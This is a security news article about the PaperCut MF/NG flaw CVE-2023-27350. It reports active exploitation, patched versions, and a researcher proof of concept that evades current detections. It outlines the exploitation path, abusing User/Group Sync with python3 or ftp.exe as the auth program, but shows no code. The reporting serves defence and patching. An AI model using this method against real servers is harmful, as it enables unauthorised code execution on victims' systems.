Cybersecurity researchers have created a new exploit for the recently disclosed critical flaw in PaperCut servers, known as CVE-2023-27350, which is able to bypass all current detection methods. The flaw, with a CVSS score of 9.8, is an Improper Access Control Vulnerability in PaperCut MF/NG. It allows authentication bypass and code execution in the context of SYSTEM within the SetupCompleted class. On April 19th, print management software provider PaperCut confirmed that it is aware of the active exploitation of the CVE-2023-27350 vulnerability, having received two vulnerability reports from cybersecurity firm Trend Micro for high/critical severity security issues in PaperCut MF/NG. Trend Micro announced that they will disclose further information about the vulnerability on May 10th, 2023.
PaperCut addressed both vulnerabilities with the release of PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11, and 22.0.9, and strongly recommends upgrading to one of these versions containing the fix. Researchers at Huntress observed post-exploitation activities within its partner environments after attackers exploited the aforementioned PaperCut MF/NG vulnerabilities. Huntress security researcher Caleb Stewart also created a proof-of-concept exploit for these threats, sharing a video PoC with the company. The report published by Huntress states, “From our recreated proof-of-concept, we observed child processes spawned underneath the pc-app.exe process. The screenshot below showcases a simple test of invoking PowerShell to call out to another location, demonstrating the achieved code execution.”
Presently, there are three types of detections based on Sysmon (e.g. process creation analysis), log file analysis, and network signatures. The researchers demonstrated how to exploit the flaw using the “User/Group Sync” feature. The PoC exploit set the auth program to “/usr/sbin/python3” on Linux and “C:WindowsSystem32ftp.exe” on Windows. By providing a malicious username and password during a login attempt, threat actors can execute arbitrary code on vulnerable servers. The experts concluded, “An administrative user attacking PaperCut NG and MF can follow multiple paths to arbitrary code execution. Detections that focus on one particular code execution method, or that focus on a small subset of techniques used by one threat actor are doomed to be useless in the next round of attacks.” They added, “Attackers learn from defenders’ public detections, so it’s the defenders’ responsibility to produce robust detections that aren’t easily bypassed.”